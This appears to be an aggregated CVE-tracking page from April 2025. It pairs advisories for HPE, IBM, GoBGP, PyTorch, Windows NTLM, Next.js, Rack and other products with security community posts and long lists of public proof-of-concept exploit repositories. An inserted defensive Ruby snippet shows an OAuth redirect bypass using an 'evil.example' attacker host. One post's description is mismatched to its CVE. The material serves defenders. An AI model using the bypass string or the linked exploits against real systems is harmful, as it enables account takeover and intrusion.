Authentication bypass vulnerability in HPE Performance Cluster Manager (CVE-2025-27086, CVSS 8.1) allows attackers to exploit Remote Method Invocation in the GUI component to gain unauthorized privileged access to affected systems (version 1.12 and earlier). HPE is recommending immediate upgrade to version 1.13 or implementing a temporary mitigation - disabling the vulnerable RMI service.

**If you are running HPE Clusters and are using HPE Performance Cluster Manager, time to patch it ASAP. Although the flaw is not scored as critical, an authentication bypass to the Cluster Manager can be a nasty vector of attack. Naturally, make sure it's only accessible from isolated and trusted networks. Then patch.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

cR0w@infosec.exchange at 2025-04-21T18:27:53.000Z ##

Remote auth bypass in HPE Performance Cluster Manager.

support.hpe.com/hpesc/public/d

sev:HIGH 8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM). This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1950
(9.4 CRITICAL)

EPSS: 0.01%

updated 2025-04-22T15:30:58

2 posts

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

beyondmachines1@infosec.exchange at 2025-04-24T11:01:35.000Z ##

Multiple vulnerabilities reported in IBM Hardware Management Console

IBM has patched multiple security vulnerabilities in its Power Hardware Management Console (HMC), including a critical flaw (CVE-2025-1950, CVSS 9.3) that allows local users to execute commands with elevated privileges due to improper validation.

**First, make sure your IBM Hardware Management Console (HMC) is isolated and accessible only from trusted networks and trusted personnel. Also check whether you are running vulnerable versions (V10.2.1030.0 and V10.3.1050.0). If you are, plan a patch cycle, because any isolation will eventually be breached.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

cR0w@infosec.exchange at 2025-04-22T15:56:48.000Z ##

Heads-up if you or your target run IBM Hardware Management Console.

ibm.com/support/pages/node/723

sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

nvd.nist.gov/vuln/detail/CVE-2

ibm.com/support/pages/node/723

sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1732
(6.7 MEDIUM)

EPSS: 0.01%

updated 2025-04-22T03:30:32

1 posts

An improper privilege management vulnerability in the recovery function of the USG FLEX H series uOS firmware version V1.31 and earlier could allow an authenticated local attacker with administrator privileges to upload a crafted configuration file and escalate privileges on a vulnerable device.

_r_netsec@infosec.exchange at 2025-04-24T00:43:06.000Z ##

Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) 0xdeadc0de.xyz/blog/cve-2025-1

##

CVE-2025-43972
(6.8 MEDIUM)

EPSS: 0.06%

updated 2025-04-21T21:55:34

1 posts

An issue was discovered in GoBGP before 3.35.0. An attacker can cause a crash in the pkg/packet/bgp/bgp.go flowspec parser by sending fewer than 20 bytes in a certain context.

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43971
(8.6 HIGH)

EPSS: 0.04%

updated 2025-04-21T21:55:26

1 posts

An issue was discovered in GoBGP before 3.35.0. pkg/packet/bgp/bgp.go allows attackers to cause a panic via a zero value for softwareVersionLen.

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43970
(4.3 MEDIUM)

EPSS: 0.02%

updated 2025-04-21T21:55:19

1 posts

An issue was discovered in GoBGP before 3.35.0. pkg/packet/mrt/mrt.go does not properly check the input length, e.g., by ensuring that there are 12 bytes or 36 bytes (depending on the address family).

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32408
(2.5 LOW)

EPSS: 0.01%

updated 2025-04-21T17:15:24.117000

1 posts

In Soffid Console 3.6.31 before 3.6.32, authorization to use the pam service is mishandled.

cR0w@infosec.exchange at 2025-04-21T13:35:02.000Z ##

Preauth code exec in an IAM platform sounds fun.

bookstack.soffid.com/books/sec

sev:HIGH 8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

In Soffid Console 3.5.38 before 3.5.39, necessary checks were not applied to some Java objects. A malicious agent could possibly execute arbitrary code in the Sync Server and compromise security.

cvedetails.com/cve/CVE-2025-32

##

CVE-2025-43916
(3.4 LOW)

EPSS: 0.03%

updated 2025-04-21T14:23:45.950000

1 posts

Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."
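The class of bug described above is an authorization server accepting a `redirect_uri` whose authority carries userinfo, so that `https://app.example@evil.example/...` passes a check that only looks at how the string begins. The following is an added example, not Sonos code and not taken from the report: a naive prefix check beside a strict validator that parses the URI, rejects any userinfo or fragment, and compares the registered URI component by component. The client registry, client id and sample URIs are made up for the example.

```ruby
require "uri"

# Hypothetical client registry: client id => exact registered redirect URIs.
REGISTERED_REDIRECTS = {
  "client-123" => ["https://app.example/oauth/callback"],
}.freeze

# The weak form: a string prefix check. "https://app.example@evil.example/..."
# begins with the registered origin, so the authorization code goes to evil.example.
def naive_prefix_check(candidate, registered: "https://app.example/oauth/callback")
  candidate.start_with?(registered.sub(%r{/oauth/callback\z}, ""))
end

# The strict form: parse, reject userinfo and fragments (RFC 6819 5.2.3.5,
# RFC 6749 3.1.2), require https, then match scheme/host/port/path/query exactly.
def redirect_uri_allowed?(client_id, candidate, registry: REGISTERED_REDIRECTS)
  uri = URI.parse(candidate)
  return false unless uri.is_a?(URI::HTTPS)  # loopback http for dev clients is a separate, explicit rule
  return false if uri.userinfo               # authority must not contain "user@" at all
  return false if uri.fragment               # redirect URIs never carry a fragment
  (registry[client_id] || []).any? do |reg|
    r = URI.parse(reg)
    r.scheme == uri.scheme && r.host == uri.host && r.port == uri.port &&
      r.path == uri.path && r.query == uri.query
  end
rescue URI::InvalidURIError
  false
end

if __FILE__ == $PROGRAM_NAME
  attack = "https://app.example@evil.example/oauth/callback"
  puts "naive:  #{naive_prefix_check(attack)}"                         # true  (bad)
  puts "strict: #{redirect_uri_allowed?('client-123', attack)}"        # false (good)
end
```

The exact-match rule also closes the path-traversal and open-redirect variants (`/oauth/callback/../admin`, `?next=`), which a prefix check on the origin alone would let through.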

cR0w@infosec.exchange at 2025-04-21T15:48:44.000Z ##

This is an interesting vuln in Sonos API.

github.com/larlarua/vulnerabil

sev:LOW 3.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N

Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

nvd.nist.gov/vuln/detail/CVE-2

What's interesting to me is in the description:

This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

A quick search for that string only returned this CVE so I don't know if it's a pending CVE or what but it might be worth watching for if you play around with Sonos things.

##

CVE-2025-43973
(6.8 MEDIUM)

EPSS: 0.04%

updated 2025-04-21T14:23:45.950000

1 posts

An issue was discovered in GoBGP before 3.35.0. pkg/packet/rtr/rtr.go does not verify that the input length corresponds to a situation in which all bytes are available for an RTR message.

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43918
(6.4 MEDIUM)

EPSS: 0.01%

updated 2025-04-20T00:31:48

1 posts

SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.

cR0w@infosec.exchange at 2025-04-19T22:43:54.000Z ##

CVE published for that ssl dot com oopsie.

bugzilla.mozilla.org/show_bug.

SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-3803
(8.8 HIGH)

EPSS: 0.05%

updated 2025-04-19T15:30:28

1 posts

A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It has been rated as critical. This issue affects the function cgiSysScheduleRebootSet of the file /bin/httpd. The manipulation of the argument rebootDate leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-3802
(8.8 HIGH)

EPSS: 0.05%

updated 2025-04-19T15:30:23

1 posts

A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It has been declared as critical. This vulnerability affects the function cgiPingSet of the file /bin/httpd. The manipulation of the argument pingIP leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-32434
(CVSS UNKNOWN)

EPSS: 0.41%

updated 2025-04-18T18:34:25

2 posts

# Description I found a Remote Command Execution (RCE) vulnerability in the PyTorch. When load model using torch.load with weights_only=True, it can still achieve RCE. # Background knowledge https://github.com/pytorch/pytorch/security As you can see, the PyTorch official documentation considers using `torch.load()` with `weights_only=True` to be safe. ![image](https://github.com/user-attachme

beyondmachines1@infosec.exchange at 2025-04-23T11:01:07.000Z ##

Critical remote code execution flaw reported in PyTorch Framework

The PyTorch machine learning framework contains a critical Remote Code Execution vulnerability (CVE-2025-32434, CVSS 9.3) affecting versions up to 2.5.1, which allows attackers to bypass the `weights_only=True` protection parameter when loading models, potentially executing arbitrary code.

**If you are using PyTorch, especially for loading third party potentially unsafe models, update your PyTorch to the latest version. Alternatively, find other ways to load models because weights_only=True parameter in the torch.load() is not safe now.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

jos1264@social.skynetcloud.site at 2025-04-21T10:45:02.000Z ##

Hackers Can Now Exploit AI Models via PyTorch – Critical Bug Found thecyberexpress.com/pytorch-vu #PyTorchVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202532434 #MLsecurity #CyberNews #AImodels

##

CVE-2025-42599
(9.8 CRITICAL)

EPSS: 0.30%

updated 2025-04-18T15:31:44

2 posts

Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffer overflow vulnerability. Receiving a specially crafted request created and sent by a remote unauthenticated attacker may lead to arbitrary code execution and/or a denial-of-service (DoS) condition.

securityland@mastodon.social at 2025-04-25T19:19:32.000Z ##

Urgent security alert for Active! mail users! A critical vulnerability (CVE-2025-42599) was exploited in zero-day attacks for over 8 months. Find out if you're affected and what steps to take now. Don't wait!

#SecurityLand #BreachBreakdown #ActiveMail #Security #ZeroDay #Cybersecurity #Vulnerability

security.land/critical-active-

##

beyondmachines1@infosec.exchange at 2025-04-23T09:01:06.000Z ##

Active! Mail remote code execution flaw actively exploited

Japanese web-based email client Active! Mail contains a critical stack-based buffer overflow vulnerability (CVE-2025-42599, CVSS 9.8) that allows unauthenticated attackers to execute arbitrary code remotely. The flaw is currently being actively exploited against Japanese organizations impacting approximately 11 million accounts, prompting Qualitia to release version 6.60.06008562 as an urgent security patch.

**If you are running Active! Mail webmail based service, disable it immediately and start patching. Because hackers are actively attacking it. You can try to mitigate the issue by blocking multipart/form-data headers, but that's not really a fix. Better to disable it fully, patch, then reactivate the service.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

CVE-2025-24054
(6.5 MEDIUM)

EPSS: 17.54%

updated 2025-04-18T14:15:17.677000

4 posts

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

3 repos

https://github.com/helidem/CVE-2025-24054-PoC

https://github.com/xigney/CVE-2025-24054_PoC

https://github.com/Marcejr117/CVE-2025-24071_PoC

benzogaga33@mamot.fr at 2025-04-22T09:40:03.000Z ##

Windows – CVE-2025-24054: this NTLM exploit is being used to target businesses and governments it-connect.fr/windows-cve-2025 #ActuCybersécurité #Cybersécurité #Phishing #Windows #NTLM

##

TomSellers@infosec.exchange at 2025-04-21T16:44:45.000Z ##

There is quite a bit of buzz related to CVE-2025-24054 which covers attackers causing victims to leak NTLM hashes if they open certain files or view certain directories. In short, this forces victims running Windows to make a connection to an attacker controlled SMB share.

Note: A patch was provided by Microsoft on March 11.

If you prevent SMB traffic from leaving your networks then you don't have to worry about this unless the attacker has already set up shop in your network. Like, patch anyway but, IMO, it would be a better use of your time to ensure that outbound SMB is blocked first. Don't forget to account for mobile devices that are off-network.

Reference:
Check Point - CVE-2025-24054, NTLM Exploit in the Wild
research.checkpoint.com/2025/c

#Security #Windows

##

0x40k@infosec.exchange at 2025-04-21T14:13:45.000Z ##

Man, what a week! 😅 Those supposedly "harmless" clicks... seriously, sometimes it's enough to make you wanna weep.

Sure, the big, flashy exploits grab the headlines. But honestly? More often than not, it's a simple dodgy config or a user clicking way too fast that really opens the door.

Working as a pentester, I see this play out constantly: those little slip-ups are frequently the most dangerous ones. It’s why you *definitely* need to keep CVE-2025-24054 on your radar and get it patched ASAP!

And folks, seriously – *never* blindly run random Python code someone just emails you out of the blue! (Yeah, we see you, potential state-sponsored actors 😉).

What about you? Got any war stories about these seemingly "small" attack vectors? Let's hear 'em! Share your experiences below. 👇

#Cybersecurity #Pentesting #OffensiveSecurity

##

Bmwalt@infosec.exchange at 2025-04-19T23:21:26.000Z ##

Heads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.

This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.

The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.

What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.

Full breakdown from Check Point here:
research.checkpoint.com/2025/c

#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow

##

CVE-2025-2567
(9.8 CRITICAL)

EPSS: 0.05%

updated 2025-04-15T21:31:48

1 posts

An attacker could modify or disable settings, disrupt fuel monitoring and supply chain operations, leading to disabling of ATG monitoring. This would result in potential safety hazards in fuel storage and transportation.

beyondmachines1@infosec.exchange at 2025-04-23T12:01:07.000Z ##

Critical authentication flaw reported in Lantronix Xport

The Lantronix Xport devices contain a critical authentication bypass vulnerability (CVE-2025-2567, CVSS 9.8) affecting versions 6.5.0.7 through 7.0.0.3 that allows remote attackers to access the configuration interface without credentials, potentially enabling disruption of critical infrastructure and creating safety hazards in fuel operations.

**If you are using Lantronix Xport devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-3587
(6.3 MEDIUM)

EPSS: 0.04%

updated 2025-04-15T18:39:27.967000

1 posts

A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

cR0w@infosec.exchange at 2025-04-21T16:16:32.000Z ##

Infinite loop DoS in Amazon dot IonDotnet.

aws.amazon.com/security/securi

sev:MED 5.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-33028
(6.1 MEDIUM)

EPSS: 0.04%

updated 2025-04-15T18:31:58

1 posts

In WinZip through 29.0, there is a Mark-of-the-Web Bypass Vulnerability because of an incomplete fix for CVE-2024-8811. This vulnerability allows attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists

bontchev@infosec.exchange at 2025-04-24T06:19:16.000Z ##

Lulz. Remember the brouhaha about the "vulnerability" in WinRAR for not preserving the Mark-of-the-Web when extracting files from downloaded archives? Well, guess what WinZIP does.

"CVE-2025-33028 - WinZip Mark-of-the-Web Bypass Vulnerability":

github.com/EnisAksu/Argonis/bl

##

CVE-2025-2636
(9.8 CRITICAL)

EPSS: 0.25%

updated 2025-04-11T15:39:52.920000

1 posts

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access

beyondmachines1@infosec.exchange at 2025-04-22T18:01:07.000Z ##

Critical flaw reported in InstaWP Connect WordPress plugin
The InstaWP Connect WordPress plugin contains a critical Local File Inclusion vulnerability (CVE-2025-2636, CVSS 9.8) in versions up to 0.1.0.85 that allows unauthenticated attackers to execute arbitrary PHP files, potentially leading to complete website compromise. Administrators should update to version 0.1.0.86 or later.

**If you have installed InstaWP Connect WordPress plugin, update it NOW. The update is trivial, and it's much easier to update a plugin and sleep easy than to worry whether you can be hacked.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-0120
(0 None)

EPSS: 0.02%

updated 2025-04-11T15:39:52.920000

1 posts

A vulnerability with a privilege management mechanism in the Palo Alto Networks GlobalProtect™ app on Windows devices allows a locally authenticated non-administrative Windows user to escalate their privileges to NT AUTHORITY\SYSTEM. However, execution requires that the local user can also successfully exploit a race condition, which makes this vulnerability difficult to exploit.

AAKL@infosec.exchange at 2025-04-22T16:27:55.000Z ##

Palo Alto updated this vulnerability yesterday.

CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (moderate) security.paloaltonetworks.com/ #PaloAlto #cybersecurity #infosec

##

CVE-2025-3248
(9.8 CRITICAL)

EPSS: 80.91%

updated 2025-04-10T01:59:49

2 posts

Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.

Nuclei template

4 repos

https://github.com/peiqiF4ck/WebFrameworkTools-5.1-main

https://github.com/verylazytech/CVE-2025-3248

https://github.com/PuddinCat/CVE-2025-3248-POC

https://github.com/xuemian168/CVE-2025-3248

CVE-2025-21204
(7.8 HIGH)

EPSS: 0.07%

updated 2025-04-08T18:34:49

4 posts

Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.

AAKL@infosec.exchange at 2025-04-23T16:13:12.000Z ##

Glad we got this out of the way.

PC World: Windows 11’s crucial new ‘inetpub’ folder, created to patch CVE-2025-21204, is laughably easy to hack pcworld.com/article/2761626/wi @pcworld #cybersecurity #infosec #Microsoft #Windows

##

mimir@meow.social at 2025-04-22T20:20:25.000Z ##

@GossiTheDog Are you sure the writeup for CVE-2025-21204 you linked is good? It seems superficially reasonable but looks very confusing on closer inspection, in a way that suggests it may be AI-generated.

But I'm not that confident in our assessment here, and will probably trust your judgement if you say it looks reasonable - we don't do too much Windows stuff

##

mttaggart@infosec.exchange at 2025-04-22T15:31:17.000Z ##

My recent linking a CVE-2025-21204 PoC is in fact BS. Deeper inspection of the PoC demonstrated no connection between the code and C:\inetpub, and what's more, the "evidence" didn't show privilege escalation.

I had concerns this was LLM crap, and I should have trusted those instincts.

##

GossiTheDog@cyberplace.social at 2025-04-22T14:23:12.000Z ##

I've written about how Microsoft's fix for a symlink vulnerability introduces another symlink vulnerability, where all users (including non-admins) can stop all future Windows OS security patches doublepulsar.com/microsofts-pa

##

CVE-2024-48887
(9.8 CRITICAL)

EPSS: 0.09%

updated 2025-04-08T18:34:48

1 posts

An unverified password change vulnerability in Fortinet FortiSwitch GUI may allow a remote unauthenticated attacker to change admin passwords via a specially crafted request

2 repos

https://github.com/groshi215/CVE-2024-48887-Exploit

https://github.com/cybersecplayground/CVE-2024-48887-FortiSwitch-Exploit

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2025-29927
(9.1 CRITICAL)

EPSS: 92.56%

updated 2025-03-28T15:32:59

1 posts

# Impact It is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. # Patches * For Next.js 15.x, this issue is fixed in `15.2.3` * For Next.js 14.x, this issue is fixed in `14.2.25` * For Next.js 13.x, this issue is fixed in `13.5.9` * For Next.js 12.x, this issue is fixed in `12.3.5` * For Next.js 11.x, consult the below workarou

Nuclei template

81 repos

https://github.com/lediusa/CVE-2025-29927

https://github.com/jmbowes/NextSecureScan

https://github.com/Neoxs/nextjs-middleware-vuln-poc

https://github.com/goncalocsousa1/CVE-2025-29927

https://github.com/fahimalshihab/NextBypass

https://github.com/t3tra-dev/cve-2025-29927-demo

https://github.com/0x0Luk/0xMiddleware

https://github.com/pouriam23/Next.js-Middleware-Bypass-CVE-2025-29927-

https://github.com/Naveen-005/Next.Js-middleware-bypass-vulnerability-CVE-2025-29927

https://github.com/Oyst3r1ng/CVE-2025-29927

https://github.com/aydinnyunus/CVE-2025-29927

https://github.com/nocomp/CVE-2025-29927-scanner

https://github.com/furmak331/CVE-2025-29927

https://github.com/nyctophile0969/CVE-2025-29927

https://github.com/kuzushiki/CVE-2025-29927-test

https://github.com/m2hcz/m2hcz-Next.js-security-flaw-CVE-2025-29927---PoC-exploit

https://github.com/gotr00t0day/CVE-2025-29927

https://github.com/RoyCampos/CVE-2025-29927

https://github.com/sn1p3rt3s7/NextJS_CVE-2025-29927

https://github.com/pickovven/vulnerable-nextjs-14-CVE-2025-29927

https://github.com/kOaDT/poc-cve-2025-29927

https://github.com/lem0n817/CVE-2025-29927

https://github.com/yuzu-juice/CVE-2025-29927_demo

https://github.com/darklotuskdb/nextjs-CVE-2025-29927-hunter

https://github.com/enochgitgamefied/NextJS-CVE-2025-29927

https://github.com/iSee857/CVE-2025-29927

https://github.com/ayato-shitomi/WebLab_CVE-2025-29927

https://github.com/ticofookfook/poc-nextjs-CVE-2025-29927

https://github.com/ethanol1310/POC-CVE-2025-29927-

https://github.com/w2hcorp/CVE-2025-29927-PoC

https://github.com/nicknisi/next-attack

https://github.com/UNICORDev/exploit-CVE-2025-29927

https://github.com/c0dejump/CVE-2025-29927-check

https://github.com/AnonKryptiQuz/NextSploit

https://github.com/Knotsecurity/CVE-2025-29927-NextJs-Middleware-Simulation

https://github.com/aleongx/CVE-2025-29927

https://github.com/Slvignesh05/CVE-2025-29927

https://github.com/yugo-eliatrope/test-cve-2025-29927

https://github.com/azu/nextjs-cve-2025-29927-poc

https://github.com/ThemeHackers/CVE-2025-29972

https://github.com/Kamal-418/Vulnerable-Lab-NextJS-CVE-2025-29927

https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927

https://github.com/elshaheedy/CVE-2025-29927-Sigma-Rule

https://github.com/EQSTLab/CVE-2025-29927

https://github.com/alihussainzada/CVE-2025-29927-PoC

https://github.com/0xcucumbersalad/cve-2025-29927

https://github.com/alastair66/CVE-2025-29927

https://github.com/ferpalma21/Automated-Next.js-Security-Scanner-for-CVE-2025-29927

https://github.com/Heimd411/CVE-2025-29927-PoC

https://github.com/MuhammadWaseem29/CVE-2025-29927-POC

https://github.com/fourcube/nextjs-middleware-bypass-demo

https://github.com/dante01yoon/CVE-2025-29927

https://github.com/mhamzakhattak/CVE-2025-29927

https://github.com/Eve-SatOrU/POC-CVE-2025-29927

https://github.com/BilalGns/CVE-2025-29927

https://github.com/Gokul-Krishnan-V-R/cve-2025-29927

https://github.com/Ademking/CVE-2025-29927

https://github.com/0xPThree/next.js_cve-2025-29927

https://github.com/6mile/nextjs-CVE-2025-29927

https://github.com/pixilated730/NextJS-Exploit-

https://github.com/maronnjapan/claude-create-CVE-2025-29927

https://github.com/TheresAFewConors/CVE-2025-29927-Testing

https://github.com/websecnl/CVE-2025-29927-PoC-Exploit

https://github.com/Nekicj/CVE-2025-29927-exploit

https://github.com/arvion-agent/next-CVE-2025-29927

https://github.com/jeymo092/cve-2025-29927

https://github.com/Grand-Moomin/Vuln-Next.js-CVE-2025-29927

https://github.com/strobes-security/nextjs-vulnerable-app

https://github.com/serhalp/test-cve-2025-29927

https://github.com/YEONDG/nextjs-cve-2025-29927

https://github.com/l1uk/nextjs-middleware-exploit

https://github.com/Jull3Hax0r/next.js-exploit

https://github.com/0xWhoknows/CVE-2025-29927

https://github.com/Balajih4kr/cve-2025-29927

https://github.com/aleongx/CVE-2025-29927_Scanner

https://github.com/kh4sh3i/CVE-2025-29927

https://github.com/takumade/ghost-route

https://github.com/narasimhauppala/nextjs-middleware-bypass

https://github.com/ValGrace/middleware-auth-bypass

https://github.com/0xPb1/Next.js-CVE-2025-29927

https://github.com/ricsirigu/CVE-2025-29927

SoLSec@mastodon.social at 2025-04-22T21:02:14.000Z ##

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) kitploit.com/2025/04/ghost-rou

##

CVE-2024-54085
(CVSS UNKNOWN)

EPSS: 0.11%

updated 2025-03-28T15:32:58

1 posts

AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.

oversecurity@mastodon.social at 2025-04-23T15:10:39.000Z ##

ASUS releases fix for AMI bug that lets hackers brick servers

ASUS has released security updates to address CVE-2024-54085, a maximum severity flaw that could allow attackers to hijack and potentially brick...

🔗️ [Bleepingcomputer] link.is.it/ky8mNl

##

CVE-2025-27840
(6.8 MEDIUM)

EPSS: 0.07%

updated 2025-03-11T18:32:12

1 posts

Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory).

3 repos

https://github.com/demining/Bluetooth-Attacks-CVE-2025-27840

https://github.com/em0gi/CVE-2025-27840

https://github.com/ladyg00se/CVE-2025-27840-WIP

CVE-2025-27610
(7.5 HIGH)

EPSS: 0.09%

updated 2025-03-10T23:15:35.073000

6 posts

Rack provides an interface for developing web applications in Ruby. Prior to versions 2.2.13, 3.0.14, and 3.1.12, `Rack::Static` can serve files under the specified `root:` even if `urls:` are provided, which may expose other files under the specified `root:` unexpectedly. The vulnerability occurs because `Rack::Static` does not properly sanitize user-supplied paths before serving files. Specifica

Sempf at 2025-04-26T04:01:08.061Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

##

AAKL at 2025-04-25T14:06:31.143Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews

##

jos1264@social.skynetcloud.site at 2025-04-25T10:30:03.000Z ##

Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) helpnetsecurity.com/2025/04/25 #webapplicationsecurity #securityupdate #vulnerability #Don'tmiss #Hotstuff #OPSWAT #News #Ruby

##

0x40k@infosec.exchange at 2025-04-25T10:18:45.000Z ##

Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.

First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.

